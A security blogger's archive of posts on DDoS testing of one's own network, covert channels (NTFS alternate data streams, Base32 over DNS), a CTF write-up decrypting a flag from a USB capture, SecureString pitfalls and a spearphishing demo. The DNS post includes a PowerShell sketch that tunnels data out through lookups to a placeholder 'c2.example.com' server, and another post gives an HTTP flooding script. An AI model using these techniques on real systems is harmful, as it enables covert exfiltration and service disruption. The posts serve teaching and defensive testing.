
Archive for the ‘Security’ Category

Surviving the Robot Apocalypse


I am on the latest BSides Chicago podcast episode: The Taz, the Wolf, and the exclusives. Security Moey interviewed me about a new talk I am developing for Chicago, titled Surviving the Robot Apocalypse.

The inspiration comes from Twitter. Tazdrumm3r once said, “@jwgoerlich <~~ My theory, he’s a Terminator from the future programmed 4 good 2 rally & lead the fight against SkyNet, MI branch.” A few weeks back, we were discussing the robotics articles I wrote for Servo magazine and some ‘bots I built with my son. To which, Infosec_Rogue said, “@jwgoerlich not only welcomes our robot overlords, he helped create them.”

I can roll with that. Let’s do it.

The goal of this session is to cover software security and software vulnerabilities in an enjoyable way. Think Naked Boulder Rolling and Risk Management. Unless, of course, you didn’t enjoy Naked Boulder Rolling. In that case, imagine some other talk I gave that you enjoyed. Or some other talk someone else gave that you enjoyed. Yeah. Pick one. Got it? Surviving is like your favorite talk, only for software security principles and their applicability to InfoSec.

I hope to see you in Chicago.

 

Surviving the Robot Apocalypse

Abstract: The robots are coming to kill us all. That, or the zombies. One way or the other, humanity stands on the brink. While many talks have focused on surviving the zombie apocalypse, few have given us insights into how to handle the killer robots. This talk seeks to fill that void. By exploring software security flaws and vulnerabilities, we will learn ways to bypass access controls, extract valuable information, and cheat death. Should the unthinkable happen and the apocalypse not come, the information learned in this session can also be applied to protecting less-than-lethal software. At the end of the day, survival is all about the software.

Privilege management at CSO


Least Privilege Management (LPM) is in the news …

The concept has been around for decades. J. Wolfgang Goerlich, information systems and information security manager for a Michigan-based financial services firm, said it was, “first explicitly called out as a design goal in the Multics operating system, in a paper by Jerome Saltzer in 1974.”

But, it appears that so far, it has still not gone mainstream. Verizon’s 2012 Data Breach Investigations Report found that, of the breaches it surveyed, 96% were not highly difficult for attackers and 97% could have been avoided through simple or intermediate controls.

“In an ideal world, the employee’s job description, system privileges, and available applications all match,” Goerlich said. “The person has the right tools and right permissions to complete a well-defined business process.”

“The real world is messy. Employees often have flexible job descriptions. The applications require more privileges than the business process requires,” he said. “[That means] trade-offs to ensure people can do their jobs, which invariably means elevating the privileges on the system to a point where the necessary applications function. But no further.”

Read the full article at CSO: Privilege management could cut breaches — if it were used

Considerations when testing Denial of Service


Stress-testing has long been a part of every IT Operations toolkit. When a new system goes in, we want to know where the weaknesses and bottlenecks are. Stress-testing is the only way.

Now, hacktivists have been providing stress-tests for years in the form of distributed denial of service attacks. Such DDoS attacks now accompany just about any news event. As moves are underway to make DDoS a form of free speech, we can expect more in the future.

With that as a background, I have been asked recently for advice on how to test for a DDoS. Here are some considerations.

First, test against the farthest-out router that you own. The “you own” part is essential. Let’s not run a DDoS across the public Internet or even across your hosting provider’s network. That is a quick way to run afoul of terms of service and, potentially, the law. Moreover, it is not a good test. A DDoS from, say, home will be bottlenecked by your ISP and the Internet backbone (1-10 Mbps). A better test is off the router interface (100-1000 Mbps).

Second, use a distributed test. A distributed test is a common practice when stress-testing. It is required to get the D in DDoS. Alright, that was a bad joke. The point is that you want to keep individual device differences, such as a bottleneck within the OS or the testing application, from affecting the test. My rule of thumb is 5:1. So if you are testing one router interface at 1 Gbps, you would want to send 5 Gbps of data via five separate computers.

Third, use a combination of traditional administration tools and the tools in use for DDoS. Stress-test both the network layer and the HTTP layer of the application. If I were to launch a DDoS test, I would likely go with iperf, loic, and hoic. Check also for tools specific to the web server, such as ab for Apache. Put together a test plan with test scripts and repeat this plan in a consistent fashion.

Fourth, test with disposable systems. The best test machine is one with a basic installation of the OS, the test tools, and the test scripts. This minimizes variables in the test. Also, while rare, it is not unheard of for tools like loic and hoic to be bundled with malicious software. Once the test is complete, the systems used for testing should be re-imaged before being returned to service.

Let’s summarize by looking at a hypothetical example. Assume we have two Internet routers, two core routers, two firewalls, and then two front-end web servers. All are on 1 Gbps network connections. I would re-image five notebooks with a base OS and the DDoS tools. With all five plugged into the network switch on the Internet routers, I would execute the DDoS test and collect the results. Then repeat the exact same test (via script) on the core routers network, on the firewall network, and on the web server network. The last step is to review the entire data set to identify bottlenecks and make recommendations for securing the network against DDoS.
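
To make the scripted repetition concrete, below is a minimal PowerShell sketch of the HTTP-layer portion of such a test plan. It is not a replacement for iperf, loic, or hoic; the target URL, worker count, and request count are placeholders, and it should only ever be pointed at systems you own.

# Minimal HTTP-layer stress sketch. Placeholders throughout; point it only at systems you own.
param(
    [string]$Target      = "http://10.0.0.10/",
    [int]$Workers        = 20,
    [int]$RequestsPerJob = 500
)

$jobs = 1..$Workers | ForEach-Object {
    Start-Job -ArgumentList $Target, $RequestsPerJob -ScriptBlock {
        param($Url, $Count)
        $client = New-Object System.Net.WebClient
        $timer  = [System.Diagnostics.Stopwatch]::StartNew()
        for ($i = 0; $i -lt $Count; $i++) {
            try { $client.DownloadString($Url) | Out-Null } catch { }
        }
        $timer.Stop()
        $timer.Elapsed.TotalSeconds   # seconds this worker took to push its requests
    }
}

# Collect per-worker timings so every run of the test plan produces comparable numbers
$jobs | Wait-Job | Receive-Job

Run the same script, unchanged, at each network segment and fold the numbers into one data set so the bottleneck comparison falls out of the results.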

That’s it. These are simple considerations that reduce the risk and increase the effectiveness of DDoS testing.

Incog: past, present, and future


I spent last summer tinkering with covert channels and steganography. It is one thing to read about a technique. It is quite another to build a tool that demonstrates a technique. To do the thing is to know the thing, as they say. It is like the art student who spends time duplicating the work of past masters.

And what did I duplicate? I started with the favorites: bitmap steganography and communication over ping packets. I did Windows-specific techniques such as NTFS ADS, shellcode injection via Kernel32.dll, mutexes, and RPC. I also replicated Dan Kaminsky’s Base32 over DNS. Then I tossed in a few evasion techniques like numbered sets and entropy masking.
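
To give a flavor of how small some of these channels are, here is a minimal PowerShell sketch of the NTFS alternate data streams technique. Incog itself implements these channels in C#; the file and stream names below are placeholders.

# Hide a message in an NTFS alternate data stream of an innocuous file
Set-Content -Path .\notes.txt -Value "Nothing to see here."
Set-Content -Path .\notes.txt -Stream "payload" -Value "The covert message."

# The cover file looks unchanged; a directory listing reports only its normal size
Get-Item .\notes.txt | Select-Object Name, Length

# The receiver reads the stream back out by name
Get-Content -Path .\notes.txt -Stream "payload"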

Incog is the result of this summer of fun. Incog is a C# library and a collection of demos which illustrate these basic techniques. I released the full source code last fall at GrrCon. You can download Incog from GitHub.

If you would like to see me present on Incog, including my latest work with new channels and full PowerShell integration, I am up for consideration for Source Boston 2013.

 

Please vote here: https://www.surveymonkey.com/s/SRCBOS13VS

This year SOURCE Boston is opening up one session to voter choice. Please select the session you would like to see at SOURCE Boston 2013. Please only vote once (we will be checking) and vote for the session you would be the most interested in seeing. Voting will close on January 15th.

OPTION 5: Punch and Counter-punch with .Net Apps, J Wolfgang Goerlich, Alice wants to send a message to Bob. Not on our network, she won’t! Who are these people? Then Alice punches a hole in the OS to send the message using some .Net code. We punch back with Windows and .Net security configurations. Punch and counter-punch, breach and block, attack and defend, the attack goes on. With this as the back story, we will walk thru sample .Net apps and Windows configurations that defenders use and attackers abuse. Short on slides and long on demo, this presentation will step thru the latest in Microsoft .Net application security.

Write-up of the 29c3 CTF “What’s This” Challenge


Subtitled: “How to capture a flag in twelve easy days”

The 29th Chaos Communication Congress (29C3) held an online capture the flag (CTF) event this year. There were several challenges, which you can see at the CTF Time page for the 29c3 CTF. I spent most of the time on the “What’s This” challenge. The clue was a USB packet capture file named what_this.pcap.

The first thing we did was run strings what_this.pcap and look at the ASCII and Unicode strings in the capture. ASCII: CASIO DIGITAL_CAMERA 1.00, FAT16, ACR122U103h. Unicode: CASIO QV DIGITAL, CASIO COMPUTER, CCID USB Reader.

The second thing we did was to open the capture in Wireshark 1.8.4. (Using the latest version of Wireshark is important as the USB packet parser is still being implemented.) We knew Philip Polstra had covered USB forensics in the past, such as at GrrCon, and Philip pointed us to http://www.linux-usb.org/usb.ids for identifying devices. We see a Genesys Logic USB-2.0 4-Port HUB (frame.number==2), a Linux Foundation USB 2.0 root hub (frame.number==4), a Holtek Semiconductor Shortboard Lefty (frame.number==32, 42), a Casio Computer device (frame.number==96, 106), and another Casio Computer device (frame.number==1790).

Supposition? The person is running Linux with a keyboard, a Casio camera, and a smart card (CCID) reader (the ACR122U) attached over USB. A Mifare Classic card is swiped on the CCID reader. The camera is mounted (FAT16) and a file or files are read from the device.

Next, we extracted the keystrokes. I had previously written a simple keystroke analyzer for the CSAW CTF Qualification Round 2012. This simply took the second byte in the USB keyboard packets (URB_INTERRUPT) and added 94. This meant the alphabetical characters were correct; however, all special characters and linefeeds were lost. The #misec 29c3 CTF captain, j3remy, passed along a lookup table. Using this lookup table, we found the following keystrokes:

dmeesg
mmouunt t vfaat //ddev/ssdb1 /usb
ccd usb
llss —l
fiille laagg
dmmeessg
nfc-lsisst
ccat flaag \ aespipe -p 3 -d 3,,, nffs-llisst \c-llisst \ grrep uuid \ cut =-d -f 10\ dd sbbs=113 couunnt=2

There are a number of problems with this method of analyzing keystrokes. First, when the key is held down too long, we get multiple letters (dmeesg). Second, special keys like shift and backspace are ignored. I redid my parser to read bytes 1, 2, and 3. The first byte in a keyboard packet is whether or not shift is depressed. The second byte is the character (including keys like enter and backspace). The third byte is the error code for repeating characters. Using this information, I mapped the HID usage tables to Microsoft’s SendKeys documentation and replayed the packet file into Notepad. (A rough sketch of this parsing pass follows the decoded output below.)

dmesg
mount -t vfat /dev/sdb1 usb
cd usb
ls -l
file  lag
dmesg
nfc-list
cat flag | aespipe -p 3 -d 3<<< "`nfc-list | grep UID | cut -d  " " -f 10-| dd bs=13 count=2`"
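
Below is a rough sketch of that second parsing pass. It is not the parser I actually used (that one mapped to SendKeys and replayed into Notepad), it covers only a handful of keys, and it assumes $reports already holds the 8-byte URB_INTERRUPT payloads exported from the capture.

# Map boot-keyboard HID reports to characters: byte 0 carries the shift
# modifier bits, byte 2 carries the first keycode in the report.
$hidMap = @{
    0x04 = 'a'; 0x05 = 'b'; 0x06 = 'c'; 0x07 = 'd'   # ... continue through 0x1d = 'z'
    0x28 = "`n"; 0x2a = '[BKSP]'; 0x2c = ' '; 0x2d = '-'; 0x38 = '/'
}

$lastKey = 0
foreach ($report in $reports) {
    $shift = ($report[0] -band 0x22) -ne 0   # left (0x02) or right (0x20) shift held
    $key   = [int]$report[2]                 # 0x00 means no key is pressed (key-up)
    if ($key -eq 0 -or $key -eq $lastKey) { $lastKey = $key; continue }   # crude held-key de-duplication
    $lastKey = $key
    if ($hidMap.ContainsKey($key)) {
        $char = $hidMap[$key]
        if ($shift) { $char = $char.ToUpper() }
        Write-Host -NoNewline $char
    }
}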

Supposition? The person at the keyboard plugged in the Casio camera and mounted it to usb. He listed the folder contents, then scanned for the Mifare Card (nfc-list lists near field communications devices via ISO14443A). Once confirmed, he read the flag from the camera and decrypted it via AES 128-bit encryption in CBC mode (man aespipe). The passcode was the UID of the Mifare Card in bytes (nfc-list | grep | cut | dd). To find the flag, we need both the UID and the flag file.

The hard work of finding the UID was done by j3remy. He followed the ACR122U API guide and traced the calls/responses. For example, frame.number==1954 reads Data: ff 00 00 00 02 d4 02, or get (ff) the firmware (d4 02). The response comes in frame.number==1961, Data: 61 08, 8 bytes coming with the firmware. Then frame.number==1966, Data: ff c0 00 00 00 08, get (ff) read (c0) the 8 bytes (08). And the card reader returns the firmware d5 03 32 01 06 07 90 00 in frame.number==1973. j3remy likewise parsed the communications and found frame.number==3427, which reads: d54b010100440007049748ba3423809000

d5 4b == pre-amble
01 == number of tags found
01 == target number
00 44 == SENS_RES
07 == Length of UID
04 97 48 ba 34 23 80 == UID
90 00 == Operation finished
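
As a worked example of that byte layout, here is a small PowerShell sketch (my own illustration, not part of the CTF tooling) that pulls the UID back out of the response string.

# Parse the tag response captured in frame.number==3427
$response = "d54b010100440007049748ba3423809000"
$bytes = 0..($response.Length / 2 - 1) | ForEach-Object {
    [Convert]::ToByte($response.Substring($_ * 2, 2), 16)
}

if ($bytes[0] -eq 0xd5 -and $bytes[1] -eq 0x4b) {      # check the pre-amble
    $uidLength = $bytes[6]                              # 0x07: seven UID bytes follow
    $uid = $bytes[7..(6 + $uidLength)] | ForEach-Object { "{0:x2}" -f $_ }
    $uid -join " "                                      # 04 97 48 ba 34 23 80
}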

The next step was to properly format the UID as the nfc-list command would display it. This took some doing. Effectively, there are 4 blank spaces before ATQA, 7 blank spaces before UID, and 6 spaces before SAK. There is one space after : and before the hexadecimal value. Each hexadecimal value is double-spaced. With that in mind, we created an nfc-list.txt file:

    ATQA (SENS_RES): 00  44
       UID (NFCID1): 04  97  48  ba  34  23  80
      SAK (SEL_RES): 00

Determining the spacing took some time. Once we had it, we could run the cat | grep | dd command and correctly return 26 bytes of ASCII characters.

$ echo "`cat nfc-list.txt | grep UID | cut -d  " " -f 10-| dd bs=13 count=2`"
2+0 records in
2+0 records out
26 bytes (26 B) copied, 6.2772e-05 s, 414 kB/s
04  97  48  ba  34  23  80

To recap: we have the UID, we have correctly converted the UID to an AES 128-bit decryption key, and we are now ready to decrypt the file. How to find the file, though? Rather than reverse engineering FAT16 over USB, we took a brute force approach. We exported all USB packets with data into files named flagnnnn (where nnnn was the frame.number). We then ran the following script:

FILES=flag*
for f in $FILES
do
    echo -e "\nProcessing $f file...\n"
    cat $f | aespipe -p 3 -d 3<<< "`cat nfc-list.txt | grep UID | cut -d  " " -f 10-| dd bs=13 count=2`"
done

There it was. In the file flag1746 (frame.number==1746), sent from the Casio camera (device 26.1) to the computer (host), we found a byte array that decrypted properly to:

29C3_ISO1443A_what_else?

What else, indeed? Well played.

Special thanks to Friedrich (aka airmack) and the 29c3 CTF organizers for an enjoyable challenge. Thanks to j3remy for captaining the #misec team and helping make sense of the ACR122 API. Helping us solve this were Philip Polstra and PhreakingGeek. It took a while, but we got it!

Not-so-secure implementations of SecureString


Microsoft .Net has an object for safely and securely handling passwords: System.Security.SecureString. “The value of a SecureString object is automatically encrypted, can be modified until your application marks it as read-only, and can be deleted from computer memory by either your application or the .NET Framework garbage collector”, according to the MSDN documentation. As with any security control, however, there are a few ways around it. Consider the following PowerShell and C# code samples.

 

# Some not-so-secure SecureString from a vendor whitepaper
$password = Read-Host -AsSecureString -Prompt "Please provide password"

// Some not-so-secure SecureString code I wrote by mistake
private void button1_Click(object sender, RoutedEventArgs e)
{
  secretString = new SecureString();
  foreach (char c in textBox1.Text.ToCharArray()) { secretString.AppendChar(c); }
  textBox1.Text = "";
}

Try the samples above. Use something like Mandiant’s Memoryze or AccessData FTK Imager to get a copy of your current Windows memory. Search the memory for your password and, sure enough, you will find it in clear text. Sometimes, as with the C# code, you will find your password several times over.

What happened? In both cases, the value was passed to the SecureString in clear text. The SecureString is encrypted; however, the original input is not. That input value may stay in memory for a long time (depending on what the underlying Windows OS is doing).

Below are some examples of populating a SecureString in such a way that the password is not exposed in clear text. As the saying goes, trust but verify. In this case, trust the method but check using Memoryze or Imager to be certain.

 

# A secure SecureString implementation
$password = New-Object System.Security.SecureString
do {
  $key = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
  if ($key.Character -eq 13) { break }
  $password.AppendChar($key.Character)
} while (1 -eq 1)

// A more secure SecureString example
private void button1_Click(object sender, RoutedEventArgs e)
{
  secretString = passwordBox1.SecurePassword;
  passwordBox1.Clear();
}

Steven Fox’s Social Illusion


Steven Fox (@SecureLexicon) has been giving a series of talks on creating social illusions. Last Friday, I joined Steven at EMU where he was presenting as part of EMU’s IA summer workshop series. The topic was spearphishing. Steven demonstrated using Maltego to create an email, while Evan Malamis showed how the Social Engineer Toolkit could weaponize and distribute the email.

Let’s suppose Steven was deliberately targeting someone who attended BSidesDetroit. What should the email look like, and who should it be from?

The first thing Steven did was create a social network nodal graph from BSidesDetroit. By navigating the graph, it became obvious there was a tight network bond between Matt Johnson, Derek Thomas, and myself. There was an “ah ha!” moment as Steven explained how a message to a target could be sent from any one of us three.

Now what topic should the email use? Steven pivoted Maltego and pointed out an interesting relationship between BSidesDetroit  and BSidesChicago. So he graphed BSidesChicago, and looked for intersections. From there, he probed to see how those intersections touched upon Matt, Derek, and me.

Out popped a tweet from Mr. Minion on the Chicago ISACA/ISSA boat cruise. Steven pulled the tweet and resulting social interactions into another graph. There, it became obvious that #misec was involved. Steven was able to pull out several key pieces of information, including URLs and the like.

The final step of the process was to write the email. Essentially, Steven combined Maltego results with some Google fu to determine how #misec would pitch an event. The look, the feel, and the tone of the message were carefully crafted. Steven even perfectly emulated my writing style. (Take a look for yourself here.)

How successful was this forgery? Consider the following three pieces of evidence.

First, one person immediately commented: “Does that count? We all know the #misec guys are doing this boat thing.” Except we are not. The interesting thing is that #misec is not actively planning a river cruise. Yet the email was so well done that the audience immediately assumed we were.

Once that was explained, another person said: "It is funny you mention the cruise. I would have clicked on it because I remember Elizabeth Martin talking about Detroit doing a boat cruise." This turned out to be a case of a person's memory adjusting to fit the facts in front of them. When I checked with Elizabeth, she had not talked about the cruise during BSidesDetroit at all.

Actually, the Twitter buzz preceded my checking with Elizabeth Martin. All the buzz led Elizabeth to the logical conclusion that there was a cruise, and she spent an hour researching boats for our event. She later tweeted out: "The best part is I thought I was supposed to plan a cruise so I started working on it!"

Think about that for a moment. Steven Fox effectively invented an event. He crafted a message so accurate that it caused people to remember it, had people believing it was actually happening, and effectively created its own reality. Talk about creating social illusions!

Software support for password strength


Xkcd is the QED of our industry. Want proof? Check out Randall Munroe’s comic on Password Strength.

Longer phrases trump mixed-up passwords every time. “Correcthorsebatterystaple” will take significantly longer to crack than, say, “p@ssw0rd”. Given this, you might wonder why the industry has not changed to longer phrases. I blame the vendors. There are a number of apps that I support and websites that I visit that still limit passwords to 14 characters. Moreover, many explicitly prevent special characters. Software support is a problem.
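
The math is easy enough to check. Here is a quick PowerShell sketch of the raw brute-force search space for each, ignoring the fact that real attackers use wordlists and mangling rules (which is exactly why “p@ssw0rd” falls even faster than these numbers suggest).

# Brute-force keyspace: alphabet size raised to the password length
function Get-Keyspace {
    param([int]$AlphabetSize, [int]$Length)
    [bigint]::Pow($AlphabetSize, $Length)
}

# "correcthorsebatterystaple": 25 characters, lower case only (26 symbols)
Get-Keyspace -AlphabetSize 26 -Length 25   # roughly 2.4 x 10^35 guesses

# "p@ssw0rd": 8 characters drawn from roughly 95 printable ASCII symbols
Get-Keyspace -AlphabetSize 95 -Length 8    # roughly 6.6 x 10^15 guesses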

There are other problems, too. See today’s Dark Reading article for the pros and cons of using phrases.

Dark Reading: Passphrases A Viable Alternative To Passwords?

There is a wish among some enterprise users that they could institute phrases, but they’re experiencing a technology lag within the software and identity management worlds that stymies the urge.

“One reason (organizations don’t use passphrases) is the number of software applications that do not support long or complex passphrases,” says J. Wolfgang Goerlich, Network Operations and Security Manager for a midwest financial services firm. “Length and special characters seem to be a challenge for some vendors. Sometimes referred to as technological debt, many IT departments must maintain a suite of apps that have not been updated with modern security recommendations.”

DNS covert channels


I am having some fun with DNS and covert channels over the holidays.

At its simplest, DNS can be used as a text-based covert channel. The DNS client sends the message via a CNAME lookup. The DNS server sends a message in response via a CNAME response. By co-opting this process, any character sequence can be sent back and forth.

What if we need to do more? Say, transfer a file? Or even browse the web? The answer here is text encoding.

Most IT folks would jump to the conclusion that the traffic simply needs to be Base64 encoded. There is a slight wrinkle. DNS CNAME queries only support 63 distinct characters: alphabetical lower case, upper case, numerals, and the dash (-). Base64 encoding is out.

The next possibility is Base32 encoding. While not often used, it fits within the DNS RFC and therefore works out of the box.
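
Here is a minimal PowerShell sketch of the idea. This is not Incog’s implementation, and the domain c2.example.com is a placeholder for a name server you control, which would decode the labels and answer with its own Base32-encoded CNAME.

# Encode a short message as Base32 (a-z, 2-7) so it survives DNS naming rules
function ConvertTo-Base32 {
    param([byte[]]$Bytes)
    $alphabet = "abcdefghijklmnopqrstuvwxyz234567"
    $bits = -join ($Bytes | ForEach-Object { [Convert]::ToString($_, 2).PadLeft(8, '0') })
    $out = ""
    for ($i = 0; $i -lt $bits.Length; $i += 5) {
        $chunk = $bits.Substring($i, [Math]::Min(5, $bits.Length - $i)).PadRight(5, '0')
        $out += $alphabet[[Convert]::ToInt32($chunk, 2)]
    }
    $out
}

$payload = [Text.Encoding]::ASCII.GetBytes("the covert message")
$encoded = ConvertTo-Base32 $payload

# DNS labels max out at 63 characters, so chunk the encoding into labels
$labels = ([regex]::Matches($encoded, ".{1,63}") | ForEach-Object { $_.Value }) -join "."
$query  = "$labels.c2.example.com"

# The lookup itself carries the message; the server's CNAME answer carries the reply
Resolve-DnsName -Name $query -Type CNAME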

The disadvantages of Base32 over DNS are packet payload size and transmission reliability. DNS is UDP and, therefore, may suffer from dropped packets. Further, the packets can only be so long. DNS host names are limited to 255 characters.

Dan Kaminsky came up with an interesting solution to these problems. He essentially tunneled IP over DNS using Base32 encoding. Such protocol layering handles the limitations of UDP. To increase the size, Kaminsky relied on the EDNS0 extension specified in RFC 2671. He released a proof of concept in the form of the OzymanDNS Perl scripts.

As a side note, the name OzymanDNS had me curious. I did some digging. It is a Watchmen comics reference which, in turn, traces back to an Egyptian pharaoh. Nothing says secret writings like comic books and pharaohs.

Anyways, in sum, covert channels over DNS are practical. With some clever protocol manipulation, binary files and even web browsing can be tunneled over DNS.

Small Business Security Advantages


I have had some great conversations since Raf Los (@Wh1t3Rabbit) posted his podcast Monday. Much of the talk has been around some advantages that we do have.

Down the Rabbithole – Episode 4 – Effective Small Business Security
http://podcast.wh1t3rabbit.net/down-the-rabbithole-episode-4-effective-small-business-security

First, information security is a scaling problem.

I have a staffing rule of thumb. I have posted it before, but I’ll repeat it. Take the employees, networked devices, and IT support staff. Security is 1 FTE per 1K employees, 1 FTE per 5K devices, or 1 FTE per 20 IT employees. Most security folks that I have talked with fall within this range, whether they work with multi-nationals or mom-and-pop shops.

This applies to my case. I am dedicated 25% to security. I have 250 end users and around a thousand end-points, servers, switches, routers, and firewalls. Luckily we have more than 5 IT folks, but you get the idea.
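
For the arithmetic-inclined, the rule of thumb reduces to a few lines of PowerShell. One way to read the "or" is to take the largest of the three ratios; the function name and figures below are just my shop's numbers, so swap in your own.

# Estimate security staffing: the largest of the three ratios wins
function Get-SecurityFte {
    param([int]$Employees, [int]$Devices, [int]$ItStaff)
    ($Employees / 1000), ($Devices / 5000), ($ItStaff / 20) |
        Measure-Object -Maximum | Select-Object -ExpandProperty Maximum
}

Get-SecurityFte -Employees 250 -Devices 1000 -ItStaff 5   # 0.25, or a quarter of an FTE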

The scope of the security challenges remains consistent regardless of scale. But we on the small and medium business side do have a few unique opportunities.

Information security pros at the SMB level have advantages.

Reach. There are fewer layers between us and executive management. The board level directives can flow right into our security planning. There are fewer layers between us and line employees. The security controls can flow right into their daily activities. Communications are simpler in smaller organizations.

Flexibility. If you are an army of one, not much time is needed for generalship. Reaction and response can be quicker. Process and procedure can be reduced, in favor of action and implementation.

Cooperation. Baking security in means getting buy-in from the IT operations team, the software development team, the IT engineering folks, the project managers, the business analysts, and IT management. With separate teams, this can mean significant work just to navigate the politics. More time can be spent on implementing and less on negotiating when all the folks are in one team.

End-to-end. One dedicated InfoSec pro in a company with fewer than 5K devices can hold the entire network in his mind. Two dedicated FTEs and 10K devices, and you’ll end up naturally dividing the work between yourselves. Reach 100K devices secured by 20 InfoSec guys, and one person knowing every nut and bolt becomes impossible.

A small network can be a very secure network.

Security flaws come from people creating security controls in a vacuum, with no relation to the organization’s mission. Security flaws come from people working on the front lines with no idea of the control environment. Flaws come from projects without security tasks, from systems that go live without security review, and from bolted-on security features. Flaws and weaknesses crop up in the gaps of responsibility between teams and between people.

A security pro in a small or medium business is in a position to make a significant contribution to their organization.